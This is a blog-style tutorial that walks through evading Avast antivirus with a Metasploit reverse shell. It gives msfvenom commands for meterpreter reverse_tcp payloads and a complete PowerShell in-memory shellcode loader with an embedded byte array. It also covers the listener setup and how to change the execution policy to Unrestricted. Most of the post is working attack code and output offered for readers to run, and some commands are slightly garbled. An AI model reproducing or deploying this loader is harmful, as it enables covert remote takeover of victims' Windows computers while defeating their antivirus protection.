Bypassing Avast Antivirus: Testing and Executing Undetected Payloads

Bypass Antivirus Avast

In this era of 2020, viruses are commonly found, which will attack our devices and antiviruses play a very important role in warding off viruses that attack our devices. You could say that with antivirus, various attacks, be it malware, adware, and viruses in general, cannot attack our devices, but what if we can bypass the antivirus so that our virus program can run without being detected by the antivirus.

Here I will do a test lab to bypass avast antivirus and this is the latest version of avast. First I will test creating a regular payload with the command:
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -f exe > test.exe
We will test to the virustotal web and get the results as shown in the picture.

the virustotal web

It appears that our shell is detected in each antivirus, now we run it on windows that have avast antivirus, to make sure it is detected.

avast antivirus

It is certain that the virus will be detected in Avast, then we will create a payload with the powershell format, namely "ps1" with additional code to bypass the avast antivirus.

You can follow the script code below and add shell code with the command :
Payload for 32bit:
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -f powershell
Payload for 64bit:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=4444 -f powershell

script code :
$code = '
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

public static extern IntPtr memset(IntPtr dest, uint src, uint count);';

$winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -p assthru;

[Byte[]] $sc = 0xfc,0xe8,0x8f,0x0,0x0,0x0,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0xc,0x8b,0x52,0x14,0xf,0xb7,0x4a,0x26,0x8b,0x72,0x28,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0xc1,0xcf,0xd,0x1,0xc7,0x49,0x75,0xef,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x1,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4c,0x1,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x1,0xd3,0x85,0xc9,0x74,0x3c,0x31,0xff,0x49,0x8b,0x34,0x8b,0x1,0xd6,0x31,0xc0,0xc1,0xcf,0xd,0xac,0x1,0xc7,0x38,0xe0,0x75,0xf4,0x3,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe0,0x58,0x8b,0x58,0x24,0x1,0xd3,0x66,0x8b,0xc,0x4b,0x8b,0x58,0x1c,0x1,0xd3,0x8b,0x4,0x8b,0x1,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xe9,0x80,0xff,0xff,0xff,0x5d,0x68,0x33,0x32,0x0,0x0,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x7,0x89,0xe8,0xff,0xd0,0xb8,0x90,0x1,0x0,0x0,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x0,0xff,0xd5,0x6a,0xa,0x68,0xc0,0xa8,0x1,0x7,0x68,0x2,0x0,0x11,0x5c,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0xf,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0xa,0xff,0x4e,0x8,0x75,0xec,0xe8,0x67,0x0,0x0,0x0,0x6a,0x0,0x6a,0x4,0x56,0x57,0x68,0x2,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x0,0x7e,0x36,0x8b,0x36,0x6a,0x40,0x68,0x0,0x10,0x0,0x0,0x56,0x6a,0x0,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x0,0x56,0x53,0x57,0x68,0x2,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x0,0x7d,0x28,0x58,0x68,0x0,0x40,0x0,0x0,0x6a,0x0,0x50,0x68,0xb,0x2f,0xf,0x30,0xff,0xd5,0x57,0x68,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0xc,0x24,0xf,0x85,0x70,0xff,0xff,0xff,0xe9,0x9b,0xff,0xff,0xff,0x1,0xc3,0x29,0xc6,0x75,0xc1,0xc3,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x0,0x53,0xff,0xd5;

$size = 0x1000;

if ($sc.Length -gt 0x1000) {$size = $sc.Length};

$x = $winFunc::VirtualAlloc(0,$size,0x3000,0x40);

for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};

$winFunc::CreateThread(0,0,$x,0,0,0);for (;;) { Start-sleep 60 };
We continue now to test on virustotal, it will appear as below:


It can be seen that the avast antivirus is not detected as a threat or virus, even though there are 6 antiviruses that detect it as a threat, we continue with virus scanning in avast with the condition that the file is already in windows.

the avast antivirus

It can be seen that the file is not detected as a virus or threat, now we test running the script in powershell and don't forget to activate metasploit with the module:

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp #for 32bit
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp #for 64bit
msf6 exploit(multi/handler) > set lhost #THIS IS YOUR IP MADE IN MSFVENOM
lhost =>
msf6 exploit(multi/handler) > options

Module options (exploit/multi/handler):

Name Current Setting Required Description
---- --------------- -------- -----------

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 7788 yes The listen port

Exploit target:

Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > exploit -j -z
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on

Next we will execute the payload in windows as below:

the avast antivirus

Above we can see that we cannot run the program because of the policy on powershell, not because of the antivirus. We will set the execution scope powershell can run our script.

Do it according to the command below:

PS C:\Users\User\Desktop> Get-ExecutionPolicy -Scope CurrentUser
PS C:\Users\User\Desktop> Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope CurrentUser

Execution Policy Change
The execution policy helps protect you from scripts that you do not trust. Changing the execution policy might expose you to the security risks described in the about_Execution_Policies help
topic at https:/ Do you want to change the execution policy?
[Y] Yes [A] Yes to All [N] No [L] No to All [S] Suspend [?] Help (default is "N"): A
PS C:\Users\User\Desktop> Get-ExecutionPolicy -Scope CurrentUser

We have made the policy change in powershell, now we repeat running our payload with the command:

Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell

PS C:\WINDOWS\system32> cd C:\Users\User\Desktop\
PS C:\Users\User\Desktop> .\avtest.ps1

Security warning
Run only scripts that you trust. While scripts from the internet can be useful, this script can potentially harm your
computer. If you trust this script, use the Unblock-File cmdlet to allow the script to run without this warning
message. Do you want to run C:\Users\User\Desktop\avtest.ps1?
[D] Do not run [R] Run once [S] Suspend [?] Help (default is "D"): R

IsPublic IsSerial Name BaseType
-------- -------- ---- --------
True True Byte[] System.Array
If it is as above without the program experiencing not responding, the exploit is successful and will run as below:

Until here you can practice in your respective labs if there are problems, please comment below.